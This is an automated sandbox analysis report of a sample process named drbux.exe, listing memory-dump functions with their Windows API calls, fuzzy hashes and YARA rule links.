Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,00000000,?,00000000,004192C9,?,@=@,00000000,0042F058,?,@=@,@=@,@=@,?,?), ref: 00419069
GetLastError.KERNEL32(004192C9,?,@=@,00000000,0042F058,?,@=@,@=@,@=@,?,?,?,004129A5,?,0042F058,00000010), ref: 00419099

Strings

@=@, xrefs: 00418FAB

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorFileLastWrite
String ID: @=@
API String ID: 442123175-2481937916
Opcode ID: d7680bdfdcf6bae2cc904f7f51d29e77e2ab78c9855adc5af2aa28a6155191fa
Instruction ID: c16ebe9c2c7931f8d578fe086d3e842e0105f43a22f9ed76cbcac03f86524b09
Opcode Fuzzy Hash: d7680bdfdcf6bae2cc904f7f51d29e77e2ab78c9855adc5af2aa28a6155191fa
Instruction Fuzzy Hash: 11318371B00219AFDB24CF69DC91BEA77B5AB48344F1440BAE505D7290DA74EDC18B68

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE47, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 0041BBF0: GetOEMCP.KERNEL32(00000000,0041BE62,?,?,R7A,00413752,?), ref: 0041BC1B

_free.LIBCMT ref: 0041BEBF

Strings

R7A, xrefs: 0041BE4F

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: _free
String ID: R7A
API String ID: 269201875-27652862
Opcode ID: 7ad8449b559696430c1c50153da0ff3bd17858283af6c457fda7da4401ea1a6b
Instruction ID: 9dabd8e28f777d29f5b5a45f0affc64381cc561f8c5015f901d7328cb4016ee2
Opcode Fuzzy Hash: 7ad8449b559696430c1c50153da0ff3bd17858283af6c457fda7da4401ea1a6b
Instruction Fuzzy Hash: B3319E71900249AFDB11DF69C881ADB7BE4EF44314F11446AFA109B2A1EB3ADD91CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00418E97, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,@=@,00000000,?,004192B9,?,@=@,00000000,0042F058,?,@=@), ref: 00418F41
GetLastError.KERNEL32(?,004192B9,?,@=@,00000000,0042F058,?,@=@,@=@,@=@,?,?,?,004129A5,?,0042F058), ref: 00418F67

Strings

@=@, xrefs: 00418ECC

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorFileLastWrite
String ID: @=@
API String ID: 442123175-2481937916
Opcode ID: aef1c57aafac1e2aa9af4bb0ce3978230b0e8222ff45b6b6a9b76ef8b8f2b571
Instruction ID: 9fb05784a8f844b27f6675056d811e77a9e3f92a17234cf35cfcc0ea26d1ae4e
Opcode Fuzzy Hash: aef1c57aafac1e2aa9af4bb0ce3978230b0e8222ff45b6b6a9b76ef8b8f2b571
Instruction Fuzzy Hash: 7A219331A012189FCB24CF19DC809D9B3B6FF48314B5445AEE909D7250DB34DDC2CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00418DBC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,?,@=@,00000000,?,004192D9,?,@=@,00000000,0042F058,?,@=@), ref: 00418E58
GetLastError.KERNEL32(?,004192D9,?,@=@,00000000,0042F058,?,@=@,@=@,@=@,?,?,?,004129A5,?,0042F058), ref: 00418E7E

Strings

@=@, xrefs: 00418DF1

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorFileLastWrite
String ID: @=@
API String ID: 442123175-2481937916
Opcode ID: ef6c103cf97e7aab1e366f00408616b9c54472a4510e866ca7f919698b77f653
Instruction ID: cfa2ffbb0064fa558cdef9a7e30ec7d4e9173aead182dc65a29f5e58d845e7ee
Opcode Fuzzy Hash: ef6c103cf97e7aab1e366f00408616b9c54472a4510e866ca7f919698b77f653
Instruction Fuzzy Hash: B1218030A012199BCB29CF29DD809DDB7B9EB49345B1440AEE906D7211DB34DE86CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00413199, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

__dosmaperr.LIBCMT ref: 004131CE

Part of subcall function 00417B7A: GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,00417D83), ref: 00417BB3

Strings

`-A, xrefs: 004131A2
`-A, xrefs: 004131A1

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CurrentDirectory__dosmaperr
String ID: `-A$`-A
API String ID: 4125400436-2383227946
Opcode ID: ec14bccfe0d7e6179b4394f3a3d2b8c4248e6436af4fb650064d937d69171b3c
Instruction ID: 9b547520a0b3b62a00953b6439e901b7c8cb69c95eedf3b27368a3d8a961e690
Opcode Fuzzy Hash: ec14bccfe0d7e6179b4394f3a3d2b8c4248e6436af4fb650064d937d69171b3c
Instruction Fuzzy Hash: 70F0F631600105B6C7249F4AC0454EAF7BDEF5279A76480AFE4588B241DB7A9BC5879C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BBF0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,0041BE62,?,?,R7A,00413752,?), ref: 0041BC1B
GetACP.KERNEL32(00000000,0041BE62,?,?,R7A,00413752,?), ref: 0041BC32

Strings

R7A, xrefs: 0041BBF2

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID: R7A
API String ID: 0-27652862
Opcode ID: c542108c24c97850090215e67c706c419e6de2da2625b7bd5386d0a93f8804f0
Instruction ID: aeefddecfe9625caa27296ee2b8ef2aa6036c79dd4670a369a3e32cd8a0aef14
Opcode Fuzzy Hash: c542108c24c97850090215e67c706c419e6de2da2625b7bd5386d0a93f8804f0
Instruction Fuzzy Hash: D2F08C309002018BD714AB68D9497A93771EB10328F60825AE038962E1EBB49A86CBCA

Uniqueness

Uniqueness Score: -1.00%

Function 00416CF7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00416D1B

Part of subcall function 00416AE1: HeapFree.KERNEL32(00000000,00000000,?,00415BDE), ref: 00416AF7
Part of subcall function 00416AE1: GetLastError.KERNEL32(?,?,00415BDE), ref: 00416B09

Strings

@=@, xrefs: 00416CFC
@=@, xrefs: 00416CFD

Memory Dump Source

Source File: 00000019.00000002.410403971.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ErrorFreeHeapLast_free
String ID: @=@$@=@
API String ID: 1353095263-2056149690
Opcode ID: 9a29a9ee377ad9294858fe1c4676810dda053fa2adde482f0b268159a5d7860b
Instruction ID: 35a71eb4ac5c2ba0dbe5b5ab842b4a8803487be2c7631ebd280edc5983a70cfb
Opcode Fuzzy Hash: 9a29a9ee377ad9294858fe1c4676810dda053fa2adde482f0b268159a5d7860b
Instruction Fuzzy Hash: 62F092772403059F8720CF6DE600AC2B7E4EF99361312892AE89DD3310D734F952CB80

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: drbux.exe PID: 1380 Parent PID: 5704 drbux.exeCOMMON

Executed Functions

Function 0586202C, Relevance: 5.7, Instructions: 5709COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.493621226.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25f0f569459f33b70cf4f7151aec80398980eba9fb41dfa7b543dc31695b6280
Instruction ID: 9db7d276362a6a953c2285b04da2cc2a19a123fd6d51cb66e8bee89287ff91a7
Opcode Fuzzy Hash: 25f0f569459f33b70cf4f7151aec80398980eba9fb41dfa7b543dc31695b6280
Instruction Fuzzy Hash: 91E3B674A40619CFDB64DF24C998EA9B7B1FF89305F1141E9E909AB361DB31AE80CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0572C880, Relevance: 1.8, APIs: 1, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.492620281.0000000005720000.00000040.00000001.sdmp, Offset: 05720000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 499bb528d0658b046288eeccfe3bb64f9c14cbae7c179ab617e58b73a5bfe372
Instruction ID: 9558b623e60e7ddc46643b2e58406ae575521dc9503a8d0d17c3c7c352f92b9b
Opcode Fuzzy Hash: 499bb528d0658b046288eeccfe3bb64f9c14cbae7c179ab617e58b73a5bfe372
Instruction Fuzzy Hash: 75C16D70D08398AFCF12CFA4D954ADDBFB5BF0A310F08809AE448AB252D7349985EF51

Uniqueness

Uniqueness Score: -1.00%

Function 0572C9CC, Relevance: 1.7, APIs: 1, Instructions: 186COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0572CB99

Memory Dump Source

Source File: 0000001A.00000002.492620281.0000000005720000.00000040.00000001.sdmp, Offset: 05720000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c5f787481a3b18746eb68536caaa1bed566d371a4da57a6c50abf3d340d0b6c5
Instruction ID: 50dbdc7de80492d18e88572e2f8fab77f24d3af230bd4f58235dfad1a8565fe8
Opcode Fuzzy Hash: c5f787481a3b18746eb68536caaa1bed566d371a4da57a6c50abf3d340d0b6c5
Instruction Fuzzy Hash: 5D71ABB4D04228DFCF21CFA9C984ADEBBB5BF19304F1491AAE808B7211D7309A85DF55

Uniqueness

Uniqueness Score: -1.00%

Function 05729E04, Relevance: 1.7, APIs: 1, Instructions: 185COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0572CB99

Memory Dump Source

Source File: 0000001A.00000002.492620281.0000000005720000.00000040.00000001.sdmp, Offset: 05720000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 473f41ff5d8972b78c0f392d7dc8e973e0cd2dc54342a8aef169379b6d0e86fe
Instruction ID: bb47b40f9f1d0778ac5e4713ef02b6facfa6b228a7b72de2b46e053b6bfd91de
Opcode Fuzzy Hash: 473f41ff5d8972b78c0f392d7dc8e973e0cd2dc54342a8aef169379b6d0e86fe
Instruction Fuzzy Hash: C7719AB4D04228DFDF21CFA9C984BDEBBB5BB19304F1491AAE808B7211D7709A85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 02FDDA60, Relevance: 1.6, APIs: 1, Instructions: 112libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 02FDDB69

Memory Dump Source

Source File: 0000001A.00000002.463474386.0000000002FD0000.00000040.00000001.sdmp, Offset: 02FD0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d8d588f80dc7299f61356b4324a364653c4a45e400dbeda7789671394e33f4a3
Instruction ID: 73150336f564260f638d9c847c7f424548d62f6b0c8e193b9ee837f65a4d39bb
Opcode Fuzzy Hash: d8d588f80dc7299f61356b4324a364653c4a45e400dbeda7789671394e33f4a3
Instruction Fuzzy Hash: 6741F1B1D002188FDB14CFA9D985BDEBBF6FB49358F24912AE815AB280D7749845CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0572CCBF, Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0572CD8E

Memory Dump Source

Source File: 0000001A.00000002.492620281.0000000005720000.00000040.00000001.sdmp, Offset: 05720000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 825d7578a95d1cdf61764d7e9fd14a9cd001335d5799ed62fea9b6d2e1adb2c0
Instruction ID: 27b423281c2406622a5ca1864197070ecd8aad266b983ba1eaf44d5a5a2a32aa
Opcode Fuzzy Hash: 825d7578a95d1cdf61764d7e9fd14a9cd001335d5799ed62fea9b6d2e1adb2c0
Instruction Fuzzy Hash: 0C41FFB5D00218AFCB11CFA8E984ADEBBF4FB19310F14845AE819B7251D335A905DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 05729EF4, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0572F381

Memory Dump Source

Source File: 0000001A.00000002.492620281.0000000005720000.00000040.00000001.sdmp, Offset: 05720000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: e14c278f1bbfe2dfdf44f71bce8164004d3ac04e071d564d125de38a02671ad0
Instruction ID: 87e9b4526bc4d274ae338664a461c0f8a2c5d069107cf888f35b0a9a10f33f21
Opcode Fuzzy Hash: e14c278f1bbfe2dfdf44f71bce8164004d3ac04e071d564d125de38a02671ad0
Instruction Fuzzy Hash: 734129B4A003158FDB14CF99C489AAABBF5FF88314F24C859E519AB321D734A841DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02FDD788, Relevance: 1.6, APIs: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 02FDD82F

Memory Dump Source

Source File: 0000001A.00000002.463474386.0000000002FD0000.00000040.00000001.sdmp, Offset: 02FD0000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 17e635977e700f95a62d94213c229fd650d76c144e735f8222418adbc86adab7
Instruction ID: a42945fa9a045ec2a36fd078d1a8f034cd13c1ab8a6cd25f39075bf5455ba7f3
Opcode Fuzzy Hash: 17e635977e700f95a62d94213c229fd650d76c144e735f8222418adbc86adab7
Instruction Fuzzy Hash: 8C3175B9D002189FCB10CFA9E984ADEFBB5BB49310F24902AE818B7310D775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 05729E3C, Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0572CD8E

Memory Dump Source

Source File: 0000001A.00000002.492620281.0000000005720000.00000040.00000001.sdmp, Offset: 05720000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: a3517a947cd7c426e12c6b7fd1c323de8e96ac87f0ea0b8332c6fba7b383bf26
Instruction ID: 32e0213b7c1fd46245cfaf81cc78daf25a14e0849f61ac9d75e502290eade13c
Opcode Fuzzy Hash: a3517a947cd7c426e12c6b7fd1c323de8e96ac87f0ea0b8332c6fba7b383bf26
Instruction Fuzzy Hash: C23195B9D01228AFCB11CF99D984ADEBBF5FB19310F24942AE815B7310D374A905CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02FDEB70, Relevance: 1.3, APIs: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02FDEC11

Memory Dump Source

Source File: 0000001A.00000002.463474386.0000000002FD0000.00000040.00000001.sdmp, Offset: 02FD0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c2d12445e20762635f4c576cdea3215ff515c57508b5c1f0729d8c626c2afbe5
Instruction ID: b4684e45114f22ee52909dca483fb0327d5ab8d2d24200362b485806cedc9cd6
Opcode Fuzzy Hash: c2d12445e20762635f4c576cdea3215ff515c57508b5c1f0729d8c626c2afbe5
Instruction Fuzzy Hash: 313184B8D002589FCF10CFA9D984ADEFBB5BB09314F24942AE818BB310D735A945CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0586DD30, Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.493621226.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a9ac2a53687353d797d513f84f866ca9e6001734a43209a557988b4ce213a9e
Instruction ID: b0735e05f0bc7a72908882099f39333dc2a401f3529a46bfb7bb019c43ea6c38
Opcode Fuzzy Hash: 0a9ac2a53687353d797d513f84f866ca9e6001734a43209a557988b4ce213a9e
Instruction Fuzzy Hash: 56916D34B107018BDB04EF79D4987AA77A2FF88304F15857DE90AAB356EF71AC458B90

Uniqueness

Uniqueness Score: -1.00%

Function 0586E1B9, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.493621226.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d629870caa6f255f327bfb90c9d15d847a13a7cad18f94c9f1dd43ccf2da2798
Instruction ID: 9a3be9919cf11e5c882d37cfc60110c5a25b93b994b5f593638129d8da57fb25
Opcode Fuzzy Hash: d629870caa6f255f327bfb90c9d15d847a13a7cad18f94c9f1dd43ccf2da2798
Instruction Fuzzy Hash: 51916C34B107008BDB04EF79D4987AA77A2FF88304F15857DE90AAB356EF75AC448B90

Uniqueness

Uniqueness Score: -1.00%

Function 0586FB28, Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.493621226.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feac9f99d7146ddd374721d49c4a93af931bd58a0b5a29c327c3f0d4bbff874e
Instruction ID: df513e55730a11b923d7a7a6823b8307794879abadc0f51c2d088ad486319c9c
Opcode Fuzzy Hash: feac9f99d7146ddd374721d49c4a93af931bd58a0b5a29c327c3f0d4bbff874e
Instruction Fuzzy Hash: 2451F430A14205CFDB14EBB8D4A86BDBBB6EF80200F14852ED906EB354DF349D45CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0586F900, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.493621226.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be3bbe6c3ef5be34c015bef6acbe7f57fb4b1f4d13cb3489a430fd28c3726347
Instruction ID: ba60616353062678e6ec458a3c7df113c7ddbc947db6754ed1d3fc9364df3e16
Opcode Fuzzy Hash: be3bbe6c3ef5be34c015bef6acbe7f57fb4b1f4d13cb3489a430fd28c3726347
Instruction Fuzzy Hash: 7F41E734B042288FDB44DBA8D898B9DB7B2BF48714F154069D905EB3A5DB79EC01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0586F680, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.493621226.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75efc5aad8bb8656875bec01e2a010991ee8a1f25ec037e971fb6e85ea0fb04f
Instruction ID: 5c20e638c3ba95ea9437af986de537b40a46382863d4b708d14bbd61907fbdbc
Opcode Fuzzy Hash: 75efc5aad8bb8656875bec01e2a010991ee8a1f25ec037e971fb6e85ea0fb04f
Instruction Fuzzy Hash: C8412A34A00615CFC714EFA8D599A9EB7F2FF88314F108869D50AAB365DB72AD00CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0194D414, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.462330101.000000000194D000.00000040.00000001.sdmp, Offset: 0194D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2abee0d8f0b0a756eaae88046a15de03ca3dbb74d56b4f2dbd4353a4f72fb119
Instruction ID: 74727f370dc5bebdab964cf578c6d2c0c964e2e673d88a88dfaa6eae5708961c
Opcode Fuzzy Hash: 2abee0d8f0b0a756eaae88046a15de03ca3dbb74d56b4f2dbd4353a4f72fb119
Instruction Fuzzy Hash: B6213675500240DFDB01DF94D8C0F56BBA9FB94724F20C969D8090B696C336E456C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 0195D01C, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.462454283.000000000195D000.00000040.00000001.sdmp, Offset: 0195D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad428d2126478480804a883f31ea9595340e6ae3f0045b9a597d510b9fded68d
Instruction ID: 5f450f8ed17b6179fbbcb09ffb8f5066005ddddab14b48b2379aa5b55cb2b151
Opcode Fuzzy Hash: ad428d2126478480804a883f31ea9595340e6ae3f0045b9a597d510b9fded68d
Instruction Fuzzy Hash: B1213471104240DFDB51EFA4D9C4F26BBA9FB84364F248969EC092B202C336D817CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0586E920, Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.493621226.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbfdce559bdcfc75395fe27c6065e232a319708cbeca19c0c18971741a0884c1
Instruction ID: ed1859f1f061ef3d6ef83fe8c43b539a54c9dcb69634a7e44f70b3203c29ab0e
Opcode Fuzzy Hash: fbfdce559bdcfc75395fe27c6065e232a319708cbeca19c0c18971741a0884c1
Instruction Fuzzy Hash: 6131F136910B09DECB01EFA8C854899FB71FF95300B11DA5AE9596B121FB30E695DB80

Uniqueness

Uniqueness Score: -1.00%

Function 0195D104, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.462454283.000000000195D000.00000040.00000001.sdmp, Offset: 0195D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4531f4d81cf21ed6919d98303641d8c2ee2a7e8b4c612f4625c0a749e129ee8
Instruction ID: 9bf4975a9a8d858463da210c50706a0c1d80d6524246d69898e70192a4b560a8
Opcode Fuzzy Hash: e4531f4d81cf21ed6919d98303641d8c2ee2a7e8b4c612f4625c0a749e129ee8
Instruction Fuzzy Hash: B021D3715042449FEB49DF94C9C0B26BBA9FB84214F24C9A9DC0D5B242C336D856CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0195D2BC, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.462454283.000000000195D000.00000040.00000001.sdmp, Offset: 0195D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c668d84c56b2597540d1f078c935b474112b242076412290fc40c9dcea51dc95
Instruction ID: 49d6d8590e76dbf80e72cdd39c9bd9d7936cef12a21e01bb7bf85acf96f6ee34
Opcode Fuzzy Hash: c668d84c56b2597540d1f078c935b474112b242076412290fc40c9dcea51dc95
Instruction Fuzzy Hash: CB21D071504240DFDB45DF94D9C0B26BBA9FB84228F24C96DDC0D5B257C33AD856CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0195D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.462454283.000000000195D000.00000040.00000001.sdmp, Offset: 0195D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5a974c82e6df7c3567325ee47e069e7c0dc5a4421d3fff02be959926bad0252
Instruction ID: c9337c7d490b6262dfe908f68bb99fac38654a17e826d389192c0161cc308395
Opcode Fuzzy Hash: b5a974c82e6df7c3567325ee47e069e7c0dc5a4421d3fff02be959926bad0252
Instruction Fuzzy Hash: F221C2710093C08FDB03DF24D994B15BFB1EB86214F2881EADC489B657C33AD41ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0194D40F, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.462330101.000000000194D000.00000040.00000001.sdmp, Offset: 0194D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55fae22f98c3025e62d185c248c323e6c2013881971a4b5e006466a194d51c1a
Instruction ID: 2c18062587739a7d97aafaaa5e067a626c17a155f30916188d4ee93b35195ddc
Opcode Fuzzy Hash: 55fae22f98c3025e62d185c248c323e6c2013881971a4b5e006466a194d51c1a
Instruction Fuzzy Hash: 9F11E176504280CFDB12CF44D5C4F56BFB1FB94724F24C2A9D8080B656C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0195D2B7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.462454283.000000000195D000.00000040.00000001.sdmp, Offset: 0195D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ca9c6a27e69dc598332f66a18a16bef25452c1415739200abfe7b15f841753
Instruction ID: edfdd8d9fb7537659f2c7d4b0c57619551a7cc83099620e1358916a78880fc6c
Opcode Fuzzy Hash: 32ca9c6a27e69dc598332f66a18a16bef25452c1415739200abfe7b15f841753
Instruction Fuzzy Hash: 8011BB75504680CFDB02CF54D5C0B15BFA1FB84228F28C6AADC494B657C33AD44ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0195D0FF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.462454283.000000000195D000.00000040.00000001.sdmp, Offset: 0195D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32ca9c6a27e69dc598332f66a18a16bef25452c1415739200abfe7b15f841753
Instruction ID: d46b7337fa1855f079f3a1580b22068ff8e29f9a3333dcad3094e0cc62328bbf
Opcode Fuzzy Hash: 32ca9c6a27e69dc598332f66a18a16bef25452c1415739200abfe7b15f841753
Instruction Fuzzy Hash: 7511DD75504280CFEB0ADF54C9C4B15BFA1FB84324F28C6A9DC494B656C33AD45ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0194D691, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.462330101.000000000194D000.00000040.00000001.sdmp, Offset: 0194D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2772f8140a47028d31f9ffcd3d40405470e8f03627cf5a358a5d4c033a7b2d3d
Instruction ID: 6f696976fb16804c9f81c234ec19f3b70ca1ce79f4169c029130f6fb3c65412c
Opcode Fuzzy Hash: 2772f8140a47028d31f9ffcd3d40405470e8f03627cf5a358a5d4c033a7b2d3d
Instruction Fuzzy Hash: 0A01F7751087849BEB118AA9CC84F67BBDCEF50268F18845EED0D4A283C3799840CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 05865F9C, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.493621226.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2efaa2bf8ad06e50932821a6defc07d7d6146ae53e7d2e0e32a3c8151de4439
Instruction ID: 9da81650497eaf0b738d108ed07d1d39ad886de7aa5273e93f16cafdd5486650
Opcode Fuzzy Hash: b2efaa2bf8ad06e50932821a6defc07d7d6146ae53e7d2e0e32a3c8151de4439
Instruction Fuzzy Hash: BEF06D343157244BE718BA2A846DBBF32AAAF84B15F00481DED06CF3D1CFA5AD4197C6

Uniqueness

Uniqueness Score: -1.00%

Function 0586E130, Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.493621226.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cef1415d2b7837dc8461c7520242c694afae401dab5923fbc016965cad46d196
Instruction ID: 1922256a72d9bb50879f3fda2596944c32c10e84e0bd36d4dcf10b068c17c63a
Opcode Fuzzy Hash: cef1415d2b7837dc8461c7520242c694afae401dab5923fbc016965cad46d196
Instruction Fuzzy Hash: C5018C303107244BE718BB69845EBBF32AAAB84B25F10482DED06CB391CFA99D4197C5

Uniqueness

Uniqueness Score: -1.00%

Function 0586DEB0, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.493621226.0000000005860000.00000040.00000001.sdmp, Offset: 05860000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fafc1dbfa63fc1f5ee534eb1cfa4e1f5c8070074dc1e3c0c1a26233fcb97c31e
Instruction ID: 6125fd2323d7e30cc3c015a899f86856810c754a4f2a4417cdb058c2ca4bd6b4
Opcode Fuzzy Hash: fafc1dbfa63fc1f5ee534eb1cfa4e1f5c8070074dc1e3c0c1a26233fcb97c31e
Instruction Fuzzy Hash: 30F090353046109FC314DE2AC454A6B73EEFF85614715489AF441C7360CB65EC418760

Uniqueness

Uniqueness Score: -1.00%

Function 0194D690, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.462330101.000000000194D000.00000040.00000001.sdmp, Offset: 0194D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d01ef9e72d79f6560c2e731020e45d26d94ed3d36d0d0bbc44176fb01f354c1
Instruction ID: 832697fb4e48056f0f235fe2ad7e998b2c40a0c94f8c615e16a3a162b6655154
Opcode Fuzzy Hash: 4d01ef9e72d79f6560c2e731020e45d26d94ed3d36d0d0bbc44176fb01f354c1
Instruction Fuzzy Hash: 8EF04F754042849FEB118A59D888B62FFECEB51674F18C45AED085E686C2B99844CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 0586EF60, Relevance: .0, Instructions: 20COMMON

